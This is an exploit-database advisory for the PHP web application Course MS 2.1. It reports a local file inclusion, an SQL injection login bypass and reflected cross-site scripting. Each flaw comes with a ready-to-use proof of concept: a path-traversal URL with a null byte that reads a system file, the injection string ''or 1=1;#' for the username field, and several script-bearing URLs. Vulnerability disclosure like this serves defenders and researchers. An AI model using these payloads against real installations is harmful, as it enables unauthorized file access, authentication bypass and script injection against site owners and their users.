course registration management system 2.1 – Multiple Vulnerabilities

• Exploit Database
• 107 阅读

• 作者： AutoSec Tools
  日期： 2011-02-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16222/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46

  Source: http://packetstormsecurity.org/files/view/98650/CourseMS2.1-LFI.txt   ------------------------------------------------------------------------ Software................Course MS 2.1 Vulnerability...........Local File Inclusion Download................http://sourceforge.net/projects/coursems Release Date............2/14/2011 Tested On...............Windows Vista + XAMPP ------------------------------------------------------------------------ Author..................AutoSec Tools Site....................http://www.autosectools.com/ ------------------------------------------------------------------------   --Description--     A local file inclusion vulnerability in Course MS 2.1 can be exploited to include arbitrary files.     --PoC--   http://localhost/coursems2_2/download_file.php?path=../../../../../../../../windows/win.ini%00     An SQL injection vulnerability in Course MS 2.1 can be exploited to bypass authentication.     --PoC--   Enter the following in the username field of the login screen:     'or 1=1;#   A reflected cross-site scripting vulnerability in Course MS 2.1 can be exploited to execute arbitrary JavaScript.     --PoC-- http://localhost/coursems2_2/gmap.php?lat=%3Cscript%3Ealert(0)%3C/script%3E&lon=%3Cscript%3Ealert(0)%3C/script%3E&add1=%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E&width=%3Cscript%3Ealert(0)%3C/script%3E&height=%3Cscript%3Ealert(0)%3C/script%3E     http://localhost/coursems2_2/resolve.php?add1=%3Cscript%3Ealert(0)%3C/script%3E